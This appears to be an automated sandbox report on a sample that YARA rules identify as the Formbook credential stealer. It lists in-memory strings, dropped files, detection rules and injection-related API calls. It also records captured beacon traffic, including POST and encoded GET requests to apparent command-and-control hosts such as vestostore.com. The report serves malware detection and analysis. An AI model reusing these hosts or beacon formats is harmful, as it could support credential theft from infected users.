          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.takealicense.com/co63/
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.takealicense.com/co63/www.naspewt.xyz
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.takealicense.comReferer:
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.438709862.0000000006DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.438709862.0000000006DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.438709862.0000000006DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vestostore.com
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vestostore.com/co63/
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vestostore.com/co63/www.saleschildcarriers.com
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vestostore.comReferer:
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.438709862.0000000006DF2000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.390741938.000000000575B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.390741938.000000000575B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cnvaB
          Source: unknownHTTP traffic detected: POST /co63/ HTTP/1.1Host: www.vestostore.comConnection: closeContent-Length: 1484Cache-Control: no-cacheOrigin: http://www.vestostore.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.vestostore.com/co63/Accept-Language: en-USAccept-Encoding: gzip, deflate
          Source: unknownDNS traffic detected: queries for: www.vestostore.com
          Source: global trafficHTTP traffic detected: GET /co63/?aJElwV=+eMjGIULdB7b+FjbEEC2CFnAZBB7ZIs3DDH5LmXZiTUQNAaNvk9FU6ysQ2HcgTeGr7Jo&lz=9rXXjDMXIb6HXH- HTTP/1.1Host: www.vestostore.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /co63/?aJElwV=gtjAeIS6VJWpMIOvAorICaUf7+ed7+VEBFwjlL0fBy8QswGl2t9TVUNzPjmUB+tmUyAO&lz=9rXXjDMXIb6HXH- HTTP/1.1Host: www.saleschildcarriers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /co63/?aJElwV=dh5wnP7Ug0+YjaaSPNPjWLPMAAuifa570LEC5RUEdgVY9PwZv9hNJ3RIsZJs9uSwpSOZ&lz=9rXXjDMXIb6HXH- HTTP/1.1Host: www.ballthingsez.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /co63/?aJElwV=7844uNirl1OmKo/iz3P/xC/n+TlWcrf11+et7B27/2a6MTbhGvfvyecJXVPFAq5Jbxq/&lz=9rXXjDMXIb6HXH- HTTP/1.1Host: www.dlafluid.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /co63/?aJElwV=McyR/z78/oMNrvlFuqxD/V8JfWPC4TTnrx7QyB/aq5OEZJfdbD3j+IdLq+ssY6HN52vi&lz=9rXXjDMXIb6HXH- HTTP/1.1Host: www.myccsmartmove.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /co63/?aJElwV=C9mZAu2amj0/7xzN/ZGYFZ9Os9Pxtlf2WxsFucW+74+VhIoIvzmW589U18pQtRovant4&lz=9rXXjDMXIb6HXH- HTTP/1.1Host: www.takealicense.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /co63/?aJElwV=3AiLeGuBi37RfNw9iEe1gED9S58L9D44LalDhi66HjPelwFncooMVS2PHplI6kLySndc&lz=9rXXjDMXIb6HXH- HTTP/1.1Host: www.mattewigs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.426300401.0000000000FEB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud

          Source: Yara matchFile source: 10.2.SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.911001855.0000000000E70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.911590172.0000000004B50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.911556119.0000000004B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.435031678.0000000003EA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          Source: C:\Windows\SysWOW64\rundll32.exeDropped file: C:\Users\user\AppData\Roaming\479O54QF\479logri.ini
          Source: C:\Windows\SysWOW64\rundll32.exeDropped file: C:\Users\user\AppData\Roaming\479O54QF\479logrv.ini
          Source: 10.2.SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 10.2.SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 10.2.SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 10.2.SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 10.2.SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.911001855.0000000000E70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000010.00000002.911001855.0000000000E70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.911001855.0000000000E70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.911590172.0000000004B50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000010.00000002.911590172.0000000004B50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.911590172.0000000004B50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.911556119.0000000004B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000010.00000002.911556119.0000000004B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.911556119.0000000004B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.435031678.0000000003EA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.435031678.0000000003EA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.435031678.0000000003EA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe PID: 6908, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe PID: 5416, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: rundll32.exe PID: 6192, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 10.2.SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 10.2.SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 10.2.SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 10.2.SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 10.2.SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.911001855.0000000000E70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000010.00000002.911001855.0000000000E70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.911001855.0000000000E70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.911590172.0000000004B50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000010.00000002.911590172.0000000004B50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.911590172.0000000004B50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.911556119.0000000004B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000010.00000002.911556119.0000000004B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.911556119.0000000004B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.435031678.0000000003EA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.435031678.0000000003EA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.435031678.0000000003EA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe PID: 6908, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe PID: 5416, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: rundll32.exe PID: 6192, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: String function: 017EB150 appears 154 times
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: String function: 01875720 appears 65 times
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: String function: 0183D08C appears 42 times
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_0041A370 NtCreateFile,10_2_0041A370
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_0041A420 NtReadFile,10_2_0041A420
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_0041A4A0 NtClose,10_2_0041A4A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_0041A550 NtAllocateVirtualMemory,10_2_0041A550
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_0041A41A NtReadFile,10_2_0041A41A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_0041A49C NtClose,10_2_0041A49C
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_01829860 NtQuerySystemInformation,LdrInitializeThunk,10_2_01829860
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_018296E0 NtFreeVirtualMemory,LdrInitializeThunk,10_2_018296E0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_01829660 NtAllocateVirtualMemory,LdrInitializeThunk,10_2_01829660
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_018299A0 NtCreateSection,10_2_018299A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_018299D0 NtCreateProcessEx,10_2_018299D0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_01829910 NtAdjustPrivilegesToken,10_2_01829910
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_01829950 NtQueueApcThread,10_2_01829950
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_018298A0 NtWriteVirtualMemory,10_2_018298A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_018298F0 NtReadVirtualMemory,10_2_018298F0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_01829820 NtEnumerateKey,10_2_01829820
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_01829840 NtDelayExecution,10_2_01829840
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_0182B040 NtSuspendThread,10_2_0182B040
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_0182A3B0 NtGetContextThread,10_2_0182A3B0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_01829B00 NtSetValueKey,10_2_01829B00
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_01829A80 NtOpenDirectoryObject,10_2_01829A80
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_01829A00 NtProtectVirtualMemory,10_2_01829A00
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_01829A10 NtQuerySection,10_2_01829A10
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_01829A20 NtResumeThread,10_2_01829A20
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_01829A50 NtCreateFile,10_2_01829A50
